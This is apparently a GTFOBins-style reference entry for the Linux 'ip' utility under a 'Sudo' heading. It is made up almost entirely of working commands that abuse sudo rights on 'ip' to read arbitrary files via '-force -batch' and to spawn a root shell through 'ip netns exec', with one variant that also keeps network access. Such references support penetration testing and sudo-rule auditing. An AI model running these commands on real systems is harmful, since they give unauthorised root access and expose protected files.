***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * LFILE=file_to_read
      sudo ip -force -batch "$LFILE"
    * This only works for Linux with CONFIG_NET_NS=y.
      sudo ip netns add foo
      sudo ip netns exec foo /bin/sh
      sudo ip netns delete foo
    * This only works for Linux with CONFIG_NET_NS=y. This version also grants
      network access.
      sudo ip netns add foo
      sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
      sudo ip netns exec bar /bin/sh
      sudo ip netns delete foo
      sudo ip netns delete bar
